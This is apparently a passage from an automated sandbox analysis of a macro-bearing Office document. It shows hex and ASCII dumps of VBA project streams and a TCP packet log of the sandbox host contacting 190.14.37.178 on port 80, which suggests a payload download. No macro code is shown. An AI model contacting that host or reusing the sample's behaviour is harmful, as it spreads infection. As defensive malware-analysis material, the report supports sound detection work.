Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2461
Entropy:	3.4974013905
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	138
Entropy:	1.48462480805
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	264
Entropy:	1.9985725068
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	256
Entropy:	1.80540314317
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	1047
Entropy:	6.66117755603
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:	01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 21:19:29.756014109 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:29.933077097 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:29.933175087 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:29.933981895 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:30.110790014 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596129894 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596172094 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596190929 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596213102 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596232891 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596317053 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.596358061 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596374035 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596386909 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.596401930 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596425056 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596436977 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.596450090 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.596463919 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.596474886 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.596508980 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.604360104 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:31.773526907 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.773566008 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.773585081 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.773600101 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:31.773783922 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.126930952 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127021074 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127074957 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127139091 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127152920 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127156019 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127190113 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127237082 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127271891 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127300024 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127326012 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127358913 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127383947 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127412081 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127429008 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127454996 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127465963 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.127489090 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.127517939 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.129183054 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.305814981 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.305856943 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.305881977 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.305900097 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.306202888 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496109009 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496145964 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496169090 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496191025 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496212006 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496232986 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496253967 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496273994 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496300936 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496325016 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496345997 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496370077 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496392012 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496413946 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496433973 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496455908 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496484041 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496506929 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496527910 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496541023 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496562004 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496575117 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496601105 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496618032 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496629000 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496651888 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496678114 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496699095 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496710062 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.496721029 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.496757984 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.499052048 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:35.673648119 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:35.673899889 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.930077076 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930110931 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930124044 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930135965 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930208921 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930227995 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930280924 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.930291891 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.930303097 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930320978 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930341959 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.930351019 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.930387020 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930402994 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:39.930423021 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.930432081 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:39.932372093 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.107127905 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.107178926 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.107198954 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.107319117 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288388968 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288429976 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288448095 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288470984 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288494110 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288516998 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288538933 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288563967 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288590908 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288604021 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288619995 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288631916 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288655043 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288685083 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288693905 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288711071 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288727045 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.288737059 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.288775921 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.466242075 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.466444016 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.630228043 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.630340099 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643292904 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643362045 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643388987 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643452883 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643467903 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643486023 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643501997 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643527031 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643538952 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643557072 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643573999 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643598080 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643623114 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643634081 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643646002 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643672943 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643682957 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643706083 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643716097 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643738985 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643749952 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643771887 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.643778086 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.643807888 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.644850016 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887506008 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887547970 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887572050 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887599945 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887624979 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887648106 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887666941 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887681961 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887693882 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887706995 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887732983 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887753963 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887768984 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887783051 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887795925 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887820005 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887833118 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887849092 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887861013 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887885094 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:40.887893915 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:40.887917995 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.054227114 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.066139936 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.066240072 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.178741932 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.178828955 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.178855896 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.178889036 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.178900957 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.178905010 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.178915024 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.178942919 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.178952932 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.178972960 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.178988934 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179018021 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179024935 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.179047108 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.179060936 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179090023 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179096937 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.179127932 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.179142952 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179164886 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179173946 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.179193020 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.179203033 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.179258108 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.180042982 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.243482113 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.243702888 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450521946 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450571060 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450593948 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450614929 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450634956 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450653076 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450669050 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450680971 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450690985 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450706959 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450730085 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450748920 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450761080 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450773001 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450793982 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450809956 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450830936 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450838089 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450866938 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450915098 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450938940 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.450952053 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.450978994 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.451169968 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.451211929 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.451317072 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.451342106 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.451366901 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.451378107 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.451416969 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.451438904 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.451452017 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.451479912 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.452977896 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.629282951 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629317045 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629343987 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629367113 CEST	49165	80	192.168.2.22	190.14.37.178
